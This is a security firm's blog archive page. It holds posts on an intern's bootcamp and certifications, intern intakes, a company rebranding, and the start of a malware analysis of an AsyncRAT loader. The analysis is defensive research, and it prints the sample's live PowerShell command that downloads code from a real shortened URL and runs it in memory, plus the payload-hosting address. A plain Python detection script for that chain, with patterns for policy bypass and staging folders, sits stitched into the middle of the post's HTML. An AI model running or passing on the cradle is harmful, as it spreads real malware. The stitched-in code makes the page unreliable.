<p>Telspace Africa, The Blog - Hackers for hire</p>
<p><span style="font-size: x-large;"><b><span style="color: #2e5395;">Transformative Journey: My Experience at the Telspace Bootcamp</span></b></span></p>
<p>Published 2023-10-27</p><div class="WordSection1">
<p class="MsoBodyText" style="margin-left: 0cm;">My journey through the world of cybersecurity
has been a series of remarkable milestones, all of which led me to the
life-changing Telspace Bootcamp experience. It all began with a triumphant win at
the ITWeb Security Summit Hackathon. This victory not only marked my entry into
the Telspace Bootcamp but also set the stage for my journey of growth and
achievement. In this blog post, I will delve into my enriching experience at the
Telspace Bootcamp, from its commencement on July 3rd, 2023, to its conclusion on
August 31st, 2023, and the certifications that crowned my journey.</p>
<p class="MsoBodyText" style="margin-left: 0cm;"><b><span style="color: #2e5395;"><span style="font-size: medium;">From Hackathon to Bootcamp: A Dream Come True</span></span></b></p>
<div style="margin-top: 0.05pt; text-align: left;">Back in June 2023, I had the opportunity of a
lifetime – participating in the ITWeb Security Summit Hackathon, which Telspace
sponsors every year. The event took place at the prestigious Sandton Convention
Centre, where cybersecurity enthusiasts and experts gathered to showcase their
skills. I was determined to prove myself in the Red Teaming Capture the Flag (CTF)
competition that was built by the Telspace Team. I was so thrilled to have emerged
as the winner of the ITWeb Security Summit Hackathon 2023. It
was an incredible journey, and I was grateful for the opportunity to showcase
my skills in identifying vulnerabilities and proposing innovative solutions.</div>
<p class="MsoBodyText" style="line-height: 107%; margin-right: 17.5pt; text-align: justify;">Upon winning the hackathon, I received an invitation to the Telspace
Bootcamp - this was a dream come true. This bootcamp was renowned for its rigorous
and comprehensive training program. It promised to not only equip me with the
necessary skills but also immerse me in the practicalities of the cybersecurity world.</p>
<p class="MsoBodyText" style="margin-left: 0cm;"><b><span style="color: #2e5395;"><span style="font-size: medium;">A Dynamic Learning Environment</span></span></b></p>
<div style="text-align: left;">From day one, the Telspace Bootcamp proved to be
a dynamic and immersive learning environment. The curriculum covered an extensive
range of cybersecurity topics, from the fundamentals to advanced techniques. The
instructors were not just educators; they were experienced
professionals who shared their real-world insights and experiences. This made
the learning experience both enriching and practical.</div><div style="text-align: left;"><br /></div>
<div style="text-align: justify;"><span style="font-size: small;"><u><b>The Bootcamp programme included, but was not limited to:</b></u></span></div><div><div><ul style="text-align: left;"><li>Hardware hacking</li><li>Hands on Hacking Fundamentals</li><li>Enterprise Infrastructure Hacking</li><li>Web Application Hacking</li><li>Mobile Application Pen testing</li><li>Hacking APIs</li><li>Academy All-Access Membership from TCM Security</li></ul></div></div></div><div class="WordSection1">
<p class="MsoListParagraph" style="margin-top: 0.9pt; tab-stops: 41.0pt; text-indent: 0cm;"><span style="font-size: medium;"><b><span style="color: #2e5395;">Hands-on Practical Exercises</span></b></span></p>
<div style="text-align: left;">One of the hallmarks of the Telspace Bootcamp was its emphasis on hands-on
practical exercises. We were not just learning theoretical concepts; we
were applying them in simulated environments. These exercises ranged from
ethical hacking and penetration testing challenges, to network security
simulations. They were designed to prepare
us for the real challenges faced by cybersecurity professionals.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">At Telspace, one of the most valuable lessons I learned was the stark contrast to many other courses/internships/bootcamps that often inundate students with tools and concepts that rarely find practical application in real-world scenarios; instead, Telspace was a refreshing departure from the norm, steadfastly focusing on those tools and topics proven to be indispensable for success as an ethical hacker, a deliberate approach that reflected the bootcamp's commitment to providing an education deeply rooted in practicality and real-world relevance, with an incredibly immersive, hands-on structure that not only demystified but also meticulously covered a multitude of foundational topics, effectively equipping me with the knowledge and skills that I knew would truly empower me in the field.</div></div><div class="WordSection2">
<p class="MsoBodyText" style="margin-left: 0cm;"><span style="font-size: medium;"><b><span style="color: #2e5395;">Mentorship and Guidance</span></b></span></p>
<div style="text-align: left;">Throughout the duration of the bootcamp, the invaluable mentorship we
received played an instrumental role in shaping our development and enhancing our
learning experience, as our dedicated mentors consistently organised and conducted live sessions,
thereby affording us the exceptional opportunity to acquire knowledge and seek
clarification through the asking of questions, with notable examples including
live demonstrations illustrating the
intricate processes of hacking a mobile application and the jailbreaking of an
iPhone; this highly personalised approach employed by our mentors proved to be
a pivotal factor in my educational journey, enabling me to surmount obstacles and gain a profound understanding of complex concepts.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><b><span style="color: #2e5395;"><span style="font-size: medium;">Earning the PJPT Certification with "Early Adopter" Badge</span></span></b></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;">One of the most significant milestones during my tenure at the Telspace Bootcamp
was achieving the PJPT (Practical Junior Penetration Tester) certification. This achievement, earned on July 27th, 2023, not only validated
my learnings in penetration testing
and ethical hacking but also came with the
prestigious "early adopter"
badge. This badge symbolised my dedication and commitment to staying at the forefront of cybersecurity knowledge, as I am part of the
first 100 to obtain this certificate.</div><div style="text-align: left;"><b><u><br /></u></b></div><div style="text-align: left;"><b><u>From the TCM Security website:</u></b></div><div style="text-align: left;"><br /></div><div style="text-align: left;">"This exam assesses
a student’s ability
to perform an internal network
penetration test at an associate level. Students will have two (2) full days to complete the
assessment and an additional two (2) days to write a professional report.</div><div style="text-align: left;"><br /></div>
<div style="margin-top: 0cm; text-align: left;"><b><u><span style="font-size: small;">In order to receive the certification, a student must:</span></u></b></div><div style="margin-top: 0cm; text-align: left;"><br /></div><div style="margin-top: 0cm; text-align: left;">Leverage their Active Directory exploitation skillsets to perform
lateral and vertical
network movements, and ultimately compromise the exam Domain Controller. Also, provide a detailed, professionally written report."</div>
</div>
<div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHrxzuPjW9dQDBREi_HLY-rX2TAG4TQO1P51ymsCHtLkMmRIgYkcGn5xJzmz4WvKipS_MZDpgXVVdCapxPKSyB0n5FA9UDUvIE6FaNjIpaZ3F8v7LHPv01oo9r6Q7WFRQ23dq0qB1QNEVQHlv4agVX8x8gxca_v1bK_PKA9q6RJi8JngFh59iPADqhnXpP/s653/PJPT.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="653" height="246" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHrxzuPjW9dQDBREi_HLY-rX2TAG4TQO1P51ymsCHtLkMmRIgYkcGn5xJzmz4WvKipS_MZDpgXVVdCapxPKSyB0n5FA9UDUvIE6FaNjIpaZ3F8v7LHPv01oo9r6Q7WFRQ23dq0qB1QNEVQHlv4agVX8x8gxca_v1bK_PKA9q6RJi8JngFh59iPADqhnXpP/s320/PJPT.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><b><span style="color: #2e5395;"><span style="font-size: medium;">Conquering the PNPT Certification</span></span></b></div><div class="separator" style="clear: both; text-align: left;"><br /></div>
<div style="text-align: left;">As my journey continued, I reached another
pinnacle on August
26th, 2023, by attaining the PNPT (Practical Network Penetration Tester)
certification. This certification further solidified my learnings in network security
and bolstered my credentials
on my journey to becoming a cybersecurity professional.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbk9CTQBMa1h0hCReQfN_611BBlv8lR4Dx3_mkfKc5Ku1NLyavBJY_YHo39dCJQBLXRnI4DG4NxZx27Kz15JDMxMfZY4D522tMMaTSNzFKD_e-f8BvEVwxYElcr912Pjz3d5hkUco2Vo9zbY7w7xNoiEw0VSBMQKOViNeiPq-FZL_1rS34oIrBOIRWOx4V/s649/PNPT.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="504" data-original-width="649" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbk9CTQBMa1h0hCReQfN_611BBlv8lR4Dx3_mkfKc5Ku1NLyavBJY_YHo39dCJQBLXRnI4DG4NxZx27Kz15JDMxMfZY4D522tMMaTSNzFKD_e-f8BvEVwxYElcr912Pjz3d5hkUco2Vo9zbY7w7xNoiEw0VSBMQKOViNeiPq-FZL_1rS34oIrBOIRWOx4V/s320/PNPT.jpg" width="320" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><b><span style="color: #2e5395;"><span style="font-size: medium;">PNPT Advice</span></span></b></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Due to NDA, I am unable to discuss specifics regarding the test; however, I
can offer the following guidance to anyone preparing to take the PNPT exam:</div>
<p class="MsoBodyText"><b><u>Finish these 5 recommended courses:</u></b></p><div style="text-align: left;"><ul style="text-align: left;"><li>Practical Ethical Hacking (PEH) course</li><li>Windows Privilege Escalation (WPE) course</li><li>Open-Source Intelligence (OSINT) course</li><li>External Pentest Playbook (EPP) course</li><li>Linux Privilege Escalation (LPE) course</li></ul></div>
<div style="text-align: left;"><h1><b><span style="color: #2e5395;"><span style="font-size: medium;">Conclusion: A Journey of Transformation</span></span></b></h1></div>
<div style="text-align: left;">My experience at the Telspace Bootcamp was not just a training program; it was a journey of transformation. It honed my skills, expanded my knowledge, and prepared me for the challenges of the cybersecurity field. I am immensely grateful for the mentorship, hands-on experience, and the certifications that have propelled me forward. This journey is just the beginning, and I look forward to the exciting opportunities and challenges that lie ahead in the
ever-evolving world of cybersecurity.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">- Blog Post by Sifundo Ngubane</div>Timhttp://www.blogger.com/profile/06308817947660589574noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-73687686310044075932023-08-02T11:27:00.000+02:002023-08-02T11:27:47.324+02:00Boot Camp: 2023<p>We kicked off our 2023 Boot Camp programme with a fresh intake of interns in July 2023. After approximately 50 grueling interviews, 6 candidates were selected and invited to attend the Boot Camp. Congratulations to all that made it!</p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;">They are already knee-deep in the Boot Camp, having already completed several modules of the boot camp within their first month!</p><p class="MsoNormal" style="margin-bottom: 0cm;"><br /></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzx8XvllzzDPQqn7_-vWGJ6AZR3vfPuZHbCUWpM4U4M0ZzKoEnbtxB4KC-euVygRKCOEnHPONNQv-Upp01yJAKGs2cjkxTURGS8ISAxQEJ0uCzTyoy6O6JygEhv6SN2ZsEXgYiYi5T4--R-qN29Ex-WzkvFkQZBM0wGyHGIbhtXYA9bz3deNAOX7C6A2ag/s4032/IMG_3136.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="3024" data-original-width="4032" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzx8XvllzzDPQqn7_-vWGJ6AZR3vfPuZHbCUWpM4U4M0ZzKoEnbtxB4KC-euVygRKCOEnHPONNQv-Upp01yJAKGs2cjkxTURGS8ISAxQEJ0uCzTyoy6O6JygEhv6SN2ZsEXgYiYi5T4--R-qN29Ex-WzkvFkQZBM0wGyHGIbhtXYA9bz3deNAOX7C6A2ag/w493-h370/IMG_3136.jpg" width="493" /></a></div><br /><br /></div><p class="MsoNormal" style="margin-bottom: 0cm;">We asked them for some feedback on their experience so far:<o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"The Telspace internship offers a dynamic and healthy 
work environment. It involves research, problem-solving, and exposure to top security experts, providing an incredible learning experience and motivation to be part of the team" - Sifundo</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"My experience in the bootcamp thus far has been challenging but very insightful. I've learned a lot in a very short time thanks to a welcoming, understanding and highly knowledgeable team." - Nathan </i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"I am in the hacker's realm. What more can I ask for? The learning experience has been great. The organisational culture is fantastic, and I plan to make the most of this golden opportunity." - Jacky</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"The bootcamp has been challenging, but I am learning a lot about penetration testing." - Muhammad</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>"Through steep learning curves, we thrived; together yet independent. Laughter fortified us, and as one, we safeguard both each other and a better tomorrow" - Shane</i></p><p class="MsoNormal" style="margin-bottom: 0cm;">For those interested in entering the industry, we regularly host boot camps. If you would like to participate in our next boot camp, please get in touch with us at <a href="mailto:recruitment@telspace.africa">recruitment@telspace.africa</a></p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;">In order to prepare yourself, the interview process covers some of the following topics: Networking, Linux, Windows, Cryptography, general information security knowledge, as well as Software Development and Exploitation. 
We are certain that our Boot Camp surpasses the industry “standard” thanks to the following:</p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"></p><ul><li><span style="text-indent: -18pt;">Our interns don’t have any monetary restraint attached to them, as they are paid a monthly salary whilst undertaking the training with us. Additionally, there are no restraints where the interns will have to pay back money if they do not end up working for Telspace at the end of the Boot Camp. Having an approach other than this would not benefit our newcomers to the industry, nor the community at large.</span></li><li><span style="text-indent: -18pt;">If interns are uncertain that they are a good fit for the industry or at Telspace Africa during the boot camp, then they are free to leave at any time, taking what they have learnt with them, including any certifications (and we are more than happy with that!).</span></li><li><span style="text-indent: -18pt;">Should our interns pass the strict criteria at the end of the boot camp, via different assessment gateways, then they will be offered a 4-month contract as a junior analyst with Telspace Africa (which they are not obliged to accept). 
If they do accept the offer, then further certifications and training will be provided by Telspace.</span></li><li>This boot camp is about growing the information security community, and thereafter, our company; in order to provide our customers with the best possible service.</li></ul><p class="MsoListParagraph" style="margin-bottom: 0cm; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -18pt;"><o:p></o:p></p><p class="MsoNormal" style="background: white; margin-bottom: 0cm; mso-line-height-alt: 9.9pt;"><b>Telspace wishes each new intern the very best of luck; we are eager to see the wonderful knowledge you will gain, as well as the many shells you will be popping!</b></p><p class="MsoNormal" style="background: white; margin-bottom: 0cm; mso-line-height-alt: 9.9pt;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"><br /></p>Timhttp://www.blogger.com/profile/06308817947660589574noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-82798349477962708842022-07-07T09:33:00.003+02:002022-07-12T09:20:25.564+02:00Boot Camp: 2022<p>We kicked off our 2022 Boot Camp programme with a fresh intake of interns in May 2022. After approximately 60
gruelling interviews, 3 candidates were selected and invited to attend the Boot
Camp. Congratulations to all that made it!</p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p>
<p class="MsoNormal" style="margin-bottom: 0cm;">They are already knee-deep in the Boot
Camp, having completed several modules of the boot camp already!</p><p class="MsoNormal" style="margin-bottom: 0cm;"><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP5O3oQzZ4G05-9_JsMla5S1l7fWLvR7v4K5ZwoW09a8oYCnwdfAF8zbEQilcbLYSHSG4u3NsQy2upM1BFjHpivw-AvmqL-HrLlG2rnstzMcIoaJs4XiDykwNzlKaW4HW72NQjeVctkNi6dLKtPuvG4zSWxAVCpejh1AJbKWK6CkgY5-c-kzdpOyuwZQ/s1380/Photo.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1035" data-original-width="1380" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP5O3oQzZ4G05-9_JsMla5S1l7fWLvR7v4K5ZwoW09a8oYCnwdfAF8zbEQilcbLYSHSG4u3NsQy2upM1BFjHpivw-AvmqL-HrLlG2rnstzMcIoaJs4XiDykwNzlKaW4HW72NQjeVctkNi6dLKtPuvG4zSWxAVCpejh1AJbKWK6CkgY5-c-kzdpOyuwZQ/w422-h316/Photo.jpg" width="422" /></a></div><br /><p class="MsoNormal" style="margin-bottom: 0cm;">We asked them for some feedback on
their experience so far:<o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>“The Telspace internship for me
is a fast-paced, healthy work environment as an intern and needs you to always be
on your toes. Whether you make mistakes or get it right first try, you keep pushing
further” – Obakeng</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>“It involves tons of research
and problem-solving. One moment, I am on top of the world as I would pwn the
machines and the next, I am back to my sorrows. I still love it though” –
Tswaitswai</i></p><p class="MsoNormal" style="margin-bottom: 0cm;"><i>“It has been an unbelievable
experience so far. I have not only had the opportunity to expand my knowledge
so vastly in such a short time but I have been afforded the opportunity to get
to know and see first-hand what some of the country’s top security experts can
do, which only adds to the excitement and motivation to become a part of this
great team” - Jason</i></p><p class="MsoNormal" style="margin-bottom: 0cm;">For those interested in entering
the industry, we will be hosting another boot camp later this year. If you
would like to participate, please get in touch with us at <a href="mailto:recruitment@telspace.africa">recruitment@telspace.africa</a></p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;">In order to prepare yourself, the
interview process covers some of the following topics: Networking, Linux,
Windows, Cryptography, general information security knowledge, as well as
Software Development and Exploitation. We are certain that our Boot Camp
surpasses the industry “standard” thanks to the following:</p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"></p><ul style="text-align: left;"><li><span style="text-indent: -18pt;">Our interns don’t have any monetary restraint
attached to them, as they are paid a monthly salary whilst undertaking the
training with us. Additionally, there are no restraints where the interns will
have to pay back money if they do not end up working for Telspace at the end of
the Boot Camp. Having an approach other than this would not benefit our
newcomers to the industry, nor the community at large.</span></li><li><span style="text-indent: -18pt;">If interns are uncertain that they are a good
fit for the industry or at Telspace Africa during the boot camp, then they are
free to leave at any time, taking what they have learnt with them, including
any certifications (and we are more than happy with that!).</span></li><li><span style="text-indent: -18pt;">Should our interns pass the strict criteria at
the end of the boot camp, via different assessment gateways, then they will be
offered a 4-month contract as a junior analyst with Telspace Africa (which they
are not obliged to accept). If they do accept the offer, then further
certifications and training will be provided by Telspace.</span></li><li>This boot camp is about growing the information
security community, and thereafter, our company; in order to provide our
customers with the best possible service.</li></ul><p class="MsoListParagraph" style="margin-bottom: 0cm; mso-add-space: auto; mso-list: l1 level1 lfo1; text-indent: -18pt;"><o:p></o:p></p><p class="MsoNormal" style="background: white; margin-bottom: 0cm; mso-line-height-alt: 9.9pt;"><b>Telspace wishes each new intern the very best of
luck; we are eager to see the wonderful knowledge you will gain, as well as the
many shells you will be popping!</b></p><p class="MsoNormal" style="background: white; margin-bottom: 0cm; mso-line-height-alt: 9.9pt;"><o:p></o:p></p><p class="MsoNormal" style="margin-bottom: 0cm;"><br /></p><p class="MsoNormal" style="margin-bottom: 0cm;"><o:p></o:p></p>Timhttp://www.blogger.com/profile/06308817947660589574noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-71266154350657242252022-05-10T13:48:00.002+02:002022-05-11T09:17:25.216+02:00A new era for Telspace<p><span style="font-size: medium;">As Telspace celebrates its 20th anniversary of being in business, I consider myself lucky to have been the Founder and CEO of such an incredible company. </span></p><p><span style="font-size: medium;">Being CEO and Founder, it’s always been a key goal of mine to give back to the community at large and more specifically the South African community. It’s not as easy to do so when you’re starting a business alone especially at 19 years old, with no experience (and no capital at all!), but we’ve always tried to do our part over the years. It’s been a pleasure to watch the South African community grow in the last 2 decades, seeing the difference between 2002 and 2022 is staggering for me. </span></p><p><span style="font-size: medium;">Throughout all the ups and downs of running a business over the last 2 decades, giving back to the community by growing it within South Africa has brought me the most joy. Watching people that started their careers with us knowing very little to now having exceptional jobs at large (or small) corporate firms, gives me a lot of happiness. The same goes for our internship programs and other free community initiatives we have run with for information security education over the years. </span></p><p style="text-align: left;"><span style="font-size: medium; font-weight: normal;">With the above being said, it is also why we, as management, have decided to change the business and rebrand to Telspace Africa. 
Our rebranding and new leadership changes are in line with our new strategy to set the foundation for the next 20 years of Telspace Africa with a stronger and clearer focus on the African market.</span></p><p><span style="font-size: medium;">It therefore gives me great pride to announce that Dr Manuel Corregedor will now be the Chief Executive Officer of Telspace Africa. Anyone that has met and knows Manuel well, will attest to what an incredible person he is. Particularly, a person of high integrity and character. In addition, he’s been a great friend to me, a mentor to countless students and staff, a phenomenal colleague, and his contributions to the information security sector in SA (and abroad) have been significant and are largely unmatched (except for a select few others in our country). I’m proud to not only know Manuel as a best friend, but also now have him as our CEO. Congratulations Manuel, you truly deserve it.</span></p><p><span style="font-size: medium;">In line with our management change, Timothy Quintal has been promoted to Chief Operating Officer. Timothy (like Manuel) is an exceptionally strong leader, a strategic and critical thinker and has a strong focus on developing others. Timothy exudes positivity and has a strong focus on growing each individual at our company. 
Also, someone I’m proud to call a great friend.</span></p><p><span style="font-size: medium;">We’ve also had other internal staff promotions in management positions internally, all with the best intentions for our staff and customers.</span></p><p><span style="font-size: medium;">Lastly, my new role at Telspace Africa as Chairman, is overlooking and steering the company in the right direction and to serve on our board in the best possible way, encouraging growth not only for our company but again, in our community.</span></p><p><span style="font-size: medium;">Thank you to all our customers and staff that have believed in us over the years, we look forward to serving you for the next 20 years and beyond.</span></p><p><span style="font-size: medium;">-Dino Covotsos</span></p><div><br /></div>break2fixhttp://www.blogger.com/profile/06040620743029387401noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-34838591154444701592021-07-15T13:55:00.096+02:002021-07-15T14:46:17.319+02:00Reverse Engineering AsyncRat Payload<p>As part of some current research that I am doing, I decided to analyse malicious samples in VBS and PS1 formats to understand what techniques APTs and malicious actors are using for obfuscation. This led me to discovering AsyncRAT which I reverse engineered and wanted to share my experiences / findings with the community. </p><p>AsyncRAT is the name of a remote access or administration tool which is used to control computers remotely. However, Chinese APT groups have been observed to be using this to perform various actions such as stealing personal information or sensitive details.</p><p>The sample that I used can be found at this link (uploaded on the 12th of July 2021): https://bazaar.abuse.ch/sample/ea477346ddead4bd4cb67cf81ca9e22f9bc6ebd57b24540e44abdecb7a3e539e/</p><p>This is a payload found in the wild that uses multiple obfuscation and file manipulation techniques as an end goal to download AsyncRAT for remote control. 
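The stages this analysis goes on to describe (Wscript starting a PowerShell download cradle, mshta run with vbscript:Execute, PowerShell run with an ExecutionPolicy bypass on a script under C:\Users\Public, and aspnet_compiler.exe started from PowerShell) each leave a process-creation record, and correlating them per host is more reliable than alerting on any single one. The following Python is an added example, not code from the original post; the event tuples, host names, the example.invalid URL, stage.ps1, the assumption that PowerShell is the parent of aspnet_compiler.exe, and the threshold of three stages are all constructed for illustration.

```python
import re
from collections import defaultdict
from typing import NamedTuple


class ProcEvent(NamedTuple):
    host: str
    parent: str   # image path of the parent process
    image: str    # image path of the new process
    cmdline: str  # full command line of the new process


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# DownloadString(...) whose result is handed to IEX / Invoke-Expression.
CRADLE = re.compile(r"downloadstring\s*\(.*?\).*?(?:\biex\b|invoke-expression)", re.I | re.S)
# -ExecutionPolicy Bypass, including the abbreviated -ep / -ex / -exec spellings.
BYPASS = re.compile(r"-(?:ep|ex[a-z]*)\s+bypass\b", re.I)
# A .ps1 under the world-writable staging folders named in the post.
STAGING = re.compile(r"[a-z]:\\(?:users\\public|programdata)\\[^\"']*\.ps1\b", re.I)


def exe(path):
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def stages(e):
    """Names of the chain stages that a single process-creation event matches."""
    parent, image, cmd = exe(e.parent), exe(e.image), e.cmdline
    hits = []
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        hits.append("script-host-spawns-powershell")
    if image in POWERSHELL and CRADLE.search(cmd):
        hits.append("in-memory-download-cradle")
    if image == "mshta.exe" and "vbscript:" in cmd.lower():
        hits.append("mshta-inline-vbscript")
    if image in POWERSHELL and BYPASS.search(cmd) and STAGING.search(cmd):
        hits.append("policy-bypass-from-staging-dir")
    if image == "aspnet_compiler.exe" and parent in POWERSHELL:
        hits.append("hollowing-host-child-of-powershell")
    return hits


def triage(events):
    """Map each host to the distinct stages seen on it, in order of first sighting."""
    per_host = defaultdict(list)
    for e in events:
        for name in stages(e):
            if name not in per_host[e.host]:
                per_host[e.host].append(name)
    return dict(per_host)


def flagged_hosts(events, threshold=3):
    """Hosts on which at least `threshold` distinct stages were observed."""
    return sorted(h for h, seen in triage(events).items() if len(seen) >= threshold)


# Constructed sample telemetry (not taken from the analysed sample).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ASPNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    ProcEvent("WS-017", EXPLORER, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\Downloads\file.vbs"'),
    ProcEvent("WS-017", r"C:\Windows\System32\wscript.exe", PS,
              r"powershell -Command (New-Object Net.WebClient).DownloadString('https://example.invalid/a.jpg') | IEX"),
    ProcEvent("WS-017", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\mshta.exe",
              r'mshta vbscript:Execute("...")'),
    ProcEvent("WS-017", r"C:\Windows\System32\mshta.exe", PS,
              r"powershell -ExecutionPolicy Bypass C:\Users\Public\stage.ps1"),
    ProcEvent("WS-017", PS, ASPNET, ASPNET),
    # Benign look-alikes: a build script and an admin running a signed-off deploy script.
    ProcEvent("BUILD-09", PS, ASPNET, r"aspnet_compiler.exe -v /app -p D:\src\app D:\out"),
    ProcEvent("DEV-02", EXPLORER, PS,
              r"powershell -ExecutionPolicy Bypass -File D:\build\deploy.ps1"),
]

if __name__ == "__main__":
    for host, seen in triage(SAMPLE_EVENTS).items():
        print(host, len(seen), seen)
    print("flagged:", flagged_hosts(SAMPLE_EVENTS))
```

BUILD-09 matches one stage and DEV-02 none, so only the host showing the whole chain is flagged.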
</p><p>The sample being analysed contains a VBS payload, the hashes can be seen in screenshot 1.1 below:</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiLRsPgKV__TlQJpUHJxiHCDdjANghBN0CS39rjj6QPlkiIL71u_327ZfOyIEjYCoNZw4H-1To_x4Sk-Y62o6de7uNshwsjcy7X0UsSo24hX3vOk7euOcdYM_SBJuhGYHCahqSSmIk2XGk/s604/Picture+1.png" style="margin-left: auto; margin-right: auto;"><img alt="1.1" border="0" data-original-height="212" data-original-width="604" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiLRsPgKV__TlQJpUHJxiHCDdjANghBN0CS39rjj6QPlkiIL71u_327ZfOyIEjYCoNZw4H-1To_x4Sk-Y62o6de7uNshwsjcy7X0UsSo24hX3vOk7euOcdYM_SBJuhGYHCahqSSmIk2XGk/w640-h224/Picture+1.png" title="1.1" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.1</td></tr></tbody></table><br /><p>The contents of file.vbs contain PowerShell commands that have been obfuscated through techniques such as replacing and splitting strings in addition to downloading files as shown in screenshot 1.2.</p><p> </p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF70979V-TBelsglxVMsHFfeIMxs6UryTD4M80-ciHwQeYqUE9AwJ_D5mIcB5MlpYz08xM3c3hI59TuspF8jqCYFhG4VxLN9sDb9ysnoJ_s7UdNh7B-XEpQ6E6y4ktVwHsJE8CJJYRrmfp/s1430/Picture+2.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="119" data-original-width="1430" height="53" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF70979V-TBelsglxVMsHFfeIMxs6UryTD4M80-ciHwQeYqUE9AwJ_D5mIcB5MlpYz08xM3c3hI59TuspF8jqCYFhG4VxLN9sDb9ysnoJ_s7UdNh7B-XEpQ6E6y4ktVwHsJE8CJJYRrmfp/w640-h53/Picture+2.png" 
width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.2</td></tr></tbody></table><br />The VBS payload executes through Wscript the command “powershell -Command (New-Object Net.WebClient.DownloadString(''https://bit.ly/3wylsze'')| IEX” , which will download the contents of the specified URL https://bit.ly/3wylsze and execute them in memory.<p></p><p>By browsing to this URL, you get redirected to https://biplabbiprodas.com/wp-content/themes/jackryan/languages/LzWZ0w70pWJ95p9s.jpg which is supposed to be a JPG image but it is not loading as shown in screenshot 1.3.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Y1hg0L0T9b0Tg4PYp9rvM7y9EIkA7eNCWKPt1NAFOxvmmomSeHhn5Vye8AGeMFa8Dd6uzHx-ZNGo6EwGUertqyNqGbE6ShUAYkxdfRhhpx6LRQD2pDUWge7Do8JKTNZKjbS80XqVY0PA/s1430/Picture+3.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="165" data-original-width="1430" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3Y1hg0L0T9b0Tg4PYp9rvM7y9EIkA7eNCWKPt1NAFOxvmmomSeHhn5Vye8AGeMFa8Dd6uzHx-ZNGo6EwGUertqyNqGbE6ShUAYkxdfRhhpx6LRQD2pDUWge7Do8JKTNZKjbS80XqVY0PA/w640-h74/Picture+3.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: 